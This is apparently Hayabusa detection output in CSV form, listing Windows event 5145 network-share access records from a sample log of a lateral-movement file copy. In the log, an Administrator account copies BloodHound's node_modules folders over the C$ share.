2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 
23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 